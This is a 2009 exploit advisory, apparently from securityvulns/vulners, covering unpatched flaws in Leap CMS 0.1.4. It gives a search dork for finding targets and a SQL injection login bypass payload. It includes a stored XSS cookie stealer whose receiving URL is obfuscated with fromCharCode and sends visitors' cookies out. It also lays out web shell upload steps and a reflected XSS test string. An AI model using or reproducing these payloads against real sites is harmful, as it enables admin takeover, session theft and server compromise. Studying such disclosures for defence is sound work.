Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21757
HistoryMay 01, 2009 - 12:00 a.m.

MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4-->

2009-05-0100:00:00
vulners.com
13

MULTIPLE REMOTE VULNERABILITIES–Leap CMS 0.1.4–>

CMS INFORMATION:

–>WEB: http://leap.gowondesigns.com/
–>DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap
–>CATEGORY: CMS / Lite
–>DESCRIPTION: Leap is a single file, template independent, open-source,
standards-compliant,extensible content management system for the web…
–>RELEASED: 2009-03-13

CMS VULNERABILITY:

–>TESTED ON: firefox 3 and I-Explorer 6
–>DORK: "Powered by Leap"
–>CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS
–>AFFECT VERSION: 0.1.4 (maybe <= ?)
–>Discovered Bug date: 2009-04-24
–>Reported Bug date: 2009-04-24
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

##############################
//////////////////////////////

AUTHENTICATION BYPASS (SQLi):

/////////////////////////////
##############################

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off ++++++++++++++++±-------->>>>


FILE VULN:

Path –> [HOME_PATH]/leap.php

function checkSession() {

    if&#40;$_POST[&#39;login&#39;]==&#39;Login&#39;&#41; { 
    
            $_SESSION[&#39;userMail&#39;]=$_POST[&#39;email&#39;]; $_SESSION[&#39;passWord&#39;]=md5&#40;$_POST[&#39;pwd&#39;]&#41;; 
                    
            ....
    }
    
    $i=@mysql_query&#40;&quot;SELECT * FROM &quot;.db&#40;&#39;prefix&#39;&#41;.&quot;users WHERE mail=&#39;$_SESSION[userMail]&#39; AND

pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);

            ....

EXPLOIT:

Email Address: nothing' or 1=1#

Password: nothing

#############################
/////////////////////////////

COOKIES STEALING VULN (XSS):

/////////////////////////////
#############################

<<<<---------++++++++++++++ Condition: Add comment ++++++++++++++++±-------->>>>


EXPLOIT:

Go to Link –> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]

There it can comment the article.

Add a comment with any name/email and message:

<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>

PHP Script (Cookies Stealer) –> See: http://www.milw0rm.com/exploits/8453
http://www.milw0rm.com/exploits/8471

Note: Exploit fails if real admin click on log-out button.

############################
////////////////////////////

SHELL UPLOAD VULNERABILITY:

////////////////////////////
############################

<<<<---------++++++++++++++ Condition: Be superadmin (above) ++++++++++++++++±-------->>>>


EXPLOIT:

Option: Manage Files. Link –> http://[HOST]/[HOME_PATH]/?admin.system.files

upload your shell there.

Then, Go to the link –> http://[HOST]/[HOME_PATH]/shell.php

########################
////////////////////////

XSS (SEARCH POST FORM):

////////////////////////
########################

Search:

"><script>alert(1)</script>

#######################################################################
#######################################################################
##*******************************************************************##

ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K …

####
##-------------------------------------------------------------------##
##
##

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################